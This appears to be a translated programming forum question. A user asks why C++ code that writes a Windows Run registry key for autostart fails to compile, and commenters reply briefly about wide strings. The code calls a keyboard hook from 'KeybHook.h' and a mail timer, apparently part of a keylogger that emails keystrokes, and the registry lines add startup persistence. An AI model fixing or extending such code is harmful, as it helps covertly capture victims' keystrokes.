我對某些C++代碼有問題。C++註冊表鍵問題
爲了更確切地說,我希望在Windows啓動時運行的程序註冊一個用於自動啓動的註冊表項。
其餘的代碼放在另一個頭文件中,我認爲你們不需要它。
#include <iostream>
#include <windows.h>
#include "KeybHook.h"
using namespace std;
int main()
{
MSG Msg;
IO::MkDir (IO::GetOurPath (true));
InstalHook();
while (GetMessage (&Msg, NULL, 0, 0))
{
TranslateMessage(&Msg);
DispatchMessage(&Msg);
}
MailTimer.Stop();
std::wstring progPath = L"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\MyApp.exe";
HKEY hkey = NULL;
LONG createStatus = RegCreateKey(HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", &hkey); //Creates a key
LONG status = RegSetValueEx(hkey, L"MyApp", 0, REG_SZ, (BYTE *)progPath.c_str(), (progPath.size()+1) * sizeof(wchar_t));
return 0;
}
而且我得到這個錯誤在編譯
main.cpp||In function 'int main()':|
main.cpp|35|error: cannot convert 'const wchar_t*' to 'LPCSTR {aka const char*}' for argument '2' to 'LONG RegCreateKeyA(HKEY, LPCSTR, PHKEY)'|
main.cpp|36|error: cannot convert 'const wchar_t*' to 'LPCSTR {aka const char*}' for argument '2' to 'LONG RegSetValueExA(HKEY, LPCSTR, DWORD, DWORD, const BYTE*, DWORD)'|
||=== Build failed: 2 error(s), 8 warning(s) (0 minute(s), 1 second(s)) ===|
使用'wstring'而不是'string'的具體原因是什麼? – Arash
@Arash Windows使用UTF-16,所以'wstring'就是你如何獲得Unicode支持。 – MrEricSir
您是否閱讀過錯誤信息?沒有解釋這個問題? –